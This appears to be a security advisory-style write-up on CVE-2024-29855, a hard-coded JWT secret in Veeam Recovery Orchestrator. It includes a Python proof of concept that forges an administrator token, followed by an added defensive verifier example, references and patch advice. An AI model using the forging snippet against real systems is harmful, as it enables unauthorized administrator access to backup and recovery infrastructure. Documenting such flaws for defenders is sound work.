A critical vulnerability, identified as CVE-2024-29855, has been discovered in the Veeam Recovery Orchestrator. This security flaw allows an attacker to bypass authentication and gain unauthorized access to sensitive information. The root cause is a hard-coded JSON Web Token (JWT) secret: JWTs are meant to give a web application tamper-evident session tokens, but when the secret that signs them is fixed in the product and known, anyone can mint tokens the application will trust. This article analyzes the issue, provides a code snippet, links to the original references, and covers the exploit details related to this vulnerability.

Background on Veeam Recovery Orchestrator

Veeam Recovery Orchestrator is a popular software solution designed to help businesses streamline disaster recovery, mitigate risks, and ensure data protection. It offers an end-to-end orchestration and automation platform that simplifies the recovery process for virtual, physical, and cloud-based resources. More information on Veeam Recovery Orchestrator can be found on its official website at: https://www.veeam.com/recovery-orchestrator.html

Exploit Details

By exploiting the hard-coded JWT secret present in the Veeam Recovery Orchestrator, an attacker can inject forged tokens, effectively bypassing the authentication process. The authentication mechanism relies on the JWT secret both to sign the access tokens it issues and to verify the ones it receives, so anyone who knows the secret can produce tokens the server accepts as genuine.

Code Snippet

The code snippet below demonstrates how an attacker can forge a JWT with malicious claims using the hard-coded JWT secret:

import jwt

hard_coded_secret = 'veeam_software_secret_key'

# Replace with the target system's administrator role or privileges
malicious_payload = {
    'username': 'hacker',
    'role': 'administrator',
    'email': 'hacker@example.com'
}

# Encode the malicious payload with the hard-coded secret to create the forged token
forged_token = jwt.encode(malicious_payload, hard_coded_secret, algorithm='HS256')

print("Malicious Token:", forged_token)

Upon executing the above Python script, the attacker can produce a JWT token containing the malicious content and use it to impersonate an authenticated administrator on the targeted Veeam Recovery Orchestrator application.
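For the defender's side of the same mechanism, here is an added example (not code from the article or from Veeam) of a verifier that does not trust a built-in key: it loads the signing secret from the environment (the variable name APP_JWT_SECRET is an assumption), refuses the article's hard-coded value and any short key, pins the algorithm to HS256 server-side, checks the expiry claim, and rejects a token minted with the hard-coded secret once the deployment uses its own key. All function names are hypothetical, the HS256 implementation uses only the standard library, and the per-deployment key is constructed at random for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time

# The secret string the article's forging snippet uses; kept here only so the
# loader can refuse it. Illustrative value from the article, not a real key.
HARD_CODED_SECRET = b"veeam_software_secret_key"

# Constructed per-deployment key: random and not in source. Stands in for a
# secret provisioned at install time and stored outside the code base.
DEPLOYMENT_SECRET = secrets.token_bytes(32)


class TokenError(Exception):
    """Raised for any token the verifier refuses."""


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint an HS256 JWT; used here only to build tokens the verifier is exercised with."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def secret_problem(raw: str):
    """Return why a candidate secret is unacceptable, or None if it passes."""
    key = raw.encode()
    if key == HARD_CODED_SECRET:
        return "matches a known hard-coded value"
    if len(key) < 32:
        return "shorter than 32 bytes"
    return None


def load_secret(env=None) -> bytes:
    """Hypothetical loader: the key comes from the environment (assumed name
    APP_JWT_SECRET), never from a literal in source, and never from a fallback."""
    env = os.environ if env is None else env
    raw = env.get("APP_JWT_SECRET")
    if raw is None:
        raise RuntimeError("APP_JWT_SECRET not set; refusing to fall back to a built-in key")
    problem = secret_problem(raw)
    if problem:
        raise RuntimeError(f"APP_JWT_SECRET rejected: {problem}")
    return raw.encode()


def verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Return the claims if the token is HS256-signed with `secret` and unexpired; raise TokenError otherwise."""
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # covers bad base64 and bad JSON
        raise TokenError("malformed token")
    # Pin the algorithm server-side; the token must not get to choose "none" or another alg.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise TokenError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise TokenError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    now = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        raise TokenError("missing or expired exp")
    return claims


def rejection_reason(token: str, secret: bytes, now=None):
    """None if the token is accepted, else the verifier's reason for refusing it."""
    try:
        verify_hs256(token, secret, now)
    except TokenError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Same claims as the article's snippet, signed with the hard-coded secret:
    # refused once the verifier uses the deployment's own key.
    forged = sign_hs256({"username": "hacker", "role": "administrator",
                         "exp": int(time.time()) + 3600}, HARD_CODED_SECRET)
    print("forged token:", rejection_reason(forged, DEPLOYMENT_SECRET))
    legit = sign_hs256({"username": "operator", "exp": int(time.time()) + 3600}, DEPLOYMENT_SECRET)
    print("legitimate token:", rejection_reason(legit, DEPLOYMENT_SECRET))
    print("hard-coded key accepted by loader?", secret_problem(HARD_CODED_SECRET.decode()) is None)
```

The two properties that matter are that the key is unique per installation and that the verifier, not the token, decides the algorithm; a hard-coded secret breaks the first, and accepting whatever `alg` the header names breaks the second. Refusing to start when no secret is configured is deliberate: a silent fallback to a default key recreates exactly the condition this CVE describes.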

References

1. Veeam Software has officially acknowledged the vulnerability and released a security advisory:
https://www.veeam.com/kb3185

2. The CVE-2024-29855 entry has been documented in the NIST National Vulnerability Database (NVD):
https://nvd.nist.gov/vuln/detail/CVE-2024-29855

Mitigation and Recommendations

Veeam Software has released a patch addressing the CVE-2024-29855 vulnerability. Users must upgrade to the latest Veeam Recovery Orchestrator software version, which includes the security fix. Other recommendations for securing your Veeam Recovery Orchestrator installation include:

- Ensuring that only authorized and trusted users have access to the Veeam Recovery Orchestrator system.

- Regularly reviewing and applying security updates and patches provided by the software vendor.

- Configuring strong access controls, such as multi-factor authentication (MFA), on systems managing sensitive information.

Conclusion

Security vulnerabilities like the CVE-2024-29855 authentication bypass caused by a hard-coded JWT secret highlight the importance of regularly updating and securing your software solutions. By staying informed about potential threats and taking proactive steps to maintain your systems, you can significantly reduce the risk of compromise. Follow the recommendations and mitigation steps provided for this particular vulnerability, and watch for updates from Veeam Software and other security-related sources.

Timeline

Published on: 06/11/2024 04:15:12 UTC
Last modified on: 06/11/2024 13:54:12 UTC